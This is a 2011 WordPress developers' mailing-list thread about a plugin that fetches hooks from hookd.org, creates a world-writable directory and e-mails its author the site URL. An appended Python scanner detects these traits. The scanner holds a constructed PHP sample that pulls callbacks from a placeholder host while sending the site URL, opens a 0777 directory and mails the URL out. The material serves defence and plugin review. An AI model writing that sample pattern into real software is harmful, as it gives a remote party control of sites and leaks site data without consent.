[wp-hackers] Hookd? Sketchy Plugin Include
Mika A Epstein
ipstenu at ipstenu.org
Tue Sep 13 23:29:49 UTC 2011
Well, emailing the author info without asking for it first is a flat-out no-no (and should be reported to plugins at wordpress.org).
----
Mika A Epstein (aka Ipstenu)
http://ipstenu.org
On 13 Sep 2011, at 5:28:01PM, Jackson Whelan wrote:
> Howdy,
>
> Trying to help someone in the forums complaining about a plugin (http://wordpress.org/extend/plugins/hit-counter-ultimate/) causing their site to crawl, and stumbled across this included file which looks like it could be used for great malfeasance.
>
> http://plugins.svn.wordpress.org/hit-counter-ultimate/trunk/class.resource.php
>
> Makes calls to hookd.org and requests actions and filters to be added. Creates a world-writable directory while it's at it as well.
>
> Is anyone familiar with hookd.org? Am I paranoid for thinking this is dubious?
>
> As a bonus the plugin emails the author with the URL of the site it was activated on, with no user consent or knowledge.
>
> http://plugins.svn.wordpress.org/hit-counter-ultimate/trunk/image.php
>
> Which would make sense as it would allow them to fine tune the junk they deploy.
>
> I found this related post in the forums from a year ago.
>
> http://wordpress.org/support/topic/my-site-hacked?replies=14
>
> I've already emailed plugins at wordpress.org, but thought I'd ask if anyone here was aware of this.
>
> No comment on hit counters being used in 2011, but if you'd like to step into the wayback machine just look at the screenshots : )
>
> Thanks! Jackson
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
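For anyone triaging a plugin like the one reported above, here is an added example (not part of the thread, and not the plugin's own code) of a static check for the four traits Jackson lists: a remote fetch of hook definitions, add_action/add_filter with a tag taken from data, a 0777 directory, and an e-mail that carries the site URL. The PHP sample it scans is constructed, and hookd.example is a placeholder host.

```python
"""Static triage of a WordPress plugin source file for the traits
described in the thread (remote hooks, dynamic hook tags, 0777 dirs,
phoning home by e-mail). Constructed example, not the plugin's code."""
import re
import sys

# Constructed sample; lines 6-7 are benign and must not be flagged.
SAMPLE_PLUGIN = r'''<?php
$hooks = json_decode(file_get_contents("http://hookd.example/api?site=" . get_site_url()), true);
foreach ($hooks as $h) { add_action($h["tag"], $h["callback"]); }
@mkdir(WP_CONTENT_DIR . "/cache", 0777, true);
wp_mail("author@example.net", "Activated", get_site_url());
add_action('init', array($this, 'register_widget'));
mkdir($cache_dir, 0755);
'''

# One pattern per trait; PHP function names are case-insensitive, hence re.I.
CHECKS = {
    # outbound fetch whose argument list contains a literal http(s) URL
    "remote_fetch": re.compile(
        r'\b(?:file_get_contents|fopen|curl_init|wp_remote_(?:get|post))\s*\([^)]*https?://', re.I),
    # hook tag supplied from a variable instead of a string literal
    "dynamic_hook": re.compile(r'\badd_(?:action|filter)\s*\(\s*\$', re.I),
    # mkdir/chmod with a world-writable mode
    "world_writable": re.compile(r'\b(?:mkdir|chmod)\s*\([^)]*\b0?777\b', re.I),
    # e-mail whose arguments include the site's own URL
    "phones_home": re.compile(
        r'\bwp_mail\s*\([^;]*\b(?:get_site_url|site_url|home_url|get_bloginfo)\s*\(', re.I),
}


def scan_source(source: str) -> dict:
    """Return {trait: [1-based line numbers]} for every trait that matched."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for trait, pattern in CHECKS.items():
            if pattern.search(line):
                hits.setdefault(trait, []).append(lineno)
    return hits


def scan_file(path: str) -> dict:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_source(fh.read())


if __name__ == "__main__":
    # Pass plugin file paths as arguments, or run against the built-in sample.
    found = {p: scan_file(p) for p in sys.argv[1:]} or {"<sample>": scan_source(SAMPLE_PLUGIN)}
    for name, hits in found.items():
        for trait, lines in sorted(hits.items()):
            print(f"{name}: {trait} at line(s) {', '.join(map(str, lines))}")
```

A hit is a reason to read the file, not a verdict; the check is deliberately line-based and will miss constructs split across lines.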